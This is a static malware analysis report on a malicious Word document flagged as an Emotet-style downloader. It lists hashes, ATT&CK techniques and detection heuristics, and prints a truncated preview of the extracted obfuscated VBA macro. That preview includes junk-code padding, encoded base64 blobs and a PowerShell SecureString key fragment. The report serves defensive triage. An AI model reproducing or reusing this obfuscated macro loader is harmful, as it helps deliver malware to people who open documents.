Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5421667aaab06c83…

MALICIOUS

Office (OLE)

Size: 176.0 KB
Created: 2018-03-23 05:27:00
Authoring application: Microsoft Office Word
First seen: 2018-04-12
MD5: c93cfc69c1ab11aa19ba957f3bb9bb29
SHA-1: 06f58655ff68b52abdba379c2552d6b81453307d
SHA-256: 5421667aaab06c83c2aa872a6d9bf73eeeb72f4792a89e80cc6bc5a78af702aa
Risk Score: 224

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro uses AutoOpen and CreateObject, indicating an attempt to execute code as soon as the document is opened. The presence of 'macros.bas' and the ClamAV signature 'Doc.Malware.Emodldr-10025032-0' strongly suggest this is downloader or dropper malware. Because the VBA script is obfuscated, the exact download URL and execution method cannot be determined with confidence from static analysis alone.

Heuristics (8)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected [medium, 3 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (source: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 46750 bytes
SHA-256: 7a021dd8d94be4e9ec5d4ae9ac92f5f33c8523cc64d0bb8660d56693a17331a3
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 23 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "bErwXQAZtiWMv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "EbWjVhiIOE"
Function qloRdPhUTSRIhj()
On Error Resume Next
Select Case VSzzRS
         Case 27469
            EFfOd = Hex(82383 - CSng(55132) - 49167 + ChrW(ucSsK))
            NwuhH = JFpEw
End Select
zzqGulQaEi = vXdizo("AA2ADYAMwBlADIAOQAxADIAYwBiAGYANAAwADQAYgBiAGUAYQA40l5qoAL", 2, 50)
Select Case AWYjm
         Case 79568
            NrzAiM = Hex(47296 - CSng(22475) - 57647 + ChrW(wohKu))
            AWlGjv = qJhccC
End Select
Select Case FjLUC
         Case 93336
            ziLas = Hex(12555 - CSng(84933) - 35685 + ChrW(BjWKz))
            jlbQfQ = XiczGs
End Select
Fifit = vXdizo("hu6kMwA1AGUAYQAxADIAOQA1ADEAZgBhAGMANwA5ADgANABjADkANAA1AGEAOAAzADIAZAAwADYAYgAzADAA6v", 5, 80)
Select Case izbtB
         Case 14241
            YMHsWQ = Hex(75044 - CSng(87924) - 10951 + ChrW(ITPCa))
            mQrIHc = uAzMiD
End Select
Select Case HdYUS
         Case 84831
            wVHfA = Hex(91008 - CSng(58621) - 80767 + ChrW(uzhqiq))
            lXuJq = hOAIz
End Select
iJHMtCz = vXdizo("%62owAAZABiADUANQA3AGQAYgBlADcAMgBkAGUAOAA3ADkAYgBmAGUANQBlAGUANwBlADIAMABjAGQAYwAxAGIAOQBhAGQAZAAwADIAZAA4ADkAZQAxADEAZABmAGUAMgAxADcAMQA2AGIANAAxAk.", 6, 143)
Select Case WvfjB
         Case 41787
            ozwlB = Hex(36680 - CSng(95568) - 5581 + ChrW(riYaQ))
            mzYiK = ntirvM
End Select
Select Case mVIWd
         Case 49566
            afkKkh = Hex(91369 - CSng(40802) - 92182 + ChrW(NmtcO))
            fTqJDQ = WmcGZ
End Select
EqdvpVwvZ = vXdizo("AU1PJsDEAMgAwAGMAYwAwADAAZABlAGMAMABhEw", 7, 31)
Select Case QKjnRF
         Case 39902
            JHGntz = Hex(94729 - CSng(72979) - 69861 + ChrW(oXtcDn))
            pJbNY = bWifJ
End Select
Select Case zhPpc
         Case 90603
            ZnOiW = Hex(94381 - CSng(44341) - 53845 + ChrW(SJHodP))
            fzqiv = wFjHv
End Select
JhwiJzu = vXdizo("%O6X.OQBkADIANAA0ADAANwA4AGMAMABjAGEAOQA4ADkAZAA2ADUANgA5MZjj", 6, 52)
Select Case KmzzGZ
         Case 50884
            XihGaV = Hex(64237 - CSng(23931) - 14535 + ChrW(MvhNjp))
            MGZpIw = BfRzU
End Select
Select Case VlMpmu
         Case 99664
            pzFZk = Hex(73956 - CSng(60976) - 6896 + ChrW(BrrjM))
            XqKVJ = FXsWn
End Select
NtzNuQs = vXdizo("mLP2GUANgAzADcAMgAyADUANgBkADQAZQBjADgANAA1ADIAOAA0ADIANQBjAGUAZgBiADMAZA2Xm", 5, 69)
Select Case aiRKGT
         Case 55728
            CYnmwO = Hex(92768 - CSng(35654) - 91247 + ChrW(HzJPo))
            bZptjZ = DzLFV
End Select
Select Case jbwhs
         Case 28667
            lvdnUu = Hex(8817 - CSng(3455) - 57082 + ChrW(RHsbY))
            HKFdXK = WMTiKL
End Select
HmtqzwIh = vXdizo("OYwAyADEANAAwADQAMwBkADQANAA1ADUAYQBlADkAOQAxADcAOAAwADgAYgBiADgANQAzADMAYgAzADEAZAAxAGIAYwA1ADEAZARLMIq", 2, 98)
Select Case BsXoi
         Case 56353
            tdtLC = Hex(86205 - CSng(18715) - 28308 + ChrW(LYHnoX))
            lbaQGa = MuqHT
End Select
Select Case InfTH
         Case 98361
            OdjdZ = Hex(89117 - CSng(21531) - 13 + ChrW(uSudK))
            ltSzcR = vsYCMR
End Select
aDUBAMMbsH = vXdizo("AzGQAMAA2A@BRtDsq", 3, 8)
Select Case odilS
         Case 86640
            VCbOV = Hex(58905 - CSng(93880) - 99171 + ChrW(jMufBl))
            KWzjh = EXhtzh
End Select
Select Case PIRww
         Case 13300
            AzkXS = Hex(40680 - CSng(71206) - 73389 + ChrW(mfITwz))
            YalGi = UwrXq
End Select
aCaWwXRbVjo = vXdizo("DqOGUAMgBjAGQAZgA0ADMAOQAwADkAZgA3ADYAYwBhADgAOQAzAGQAZQA1AGEA' |ConveRtto-SEcUrESTrINg  -ke 111,232,165,20,176,188,237,179,61,SqD@a", 4, 124)
Select Case UWPvlz
         Case 44013
            IOiJUj = Hex(35754 - CSng(49591) - 70442 + ChrW(WRPGtV))
            Aabdl = uiERXW
End Select
Select Case NCtPwX
         Case 1901
            
... (truncated)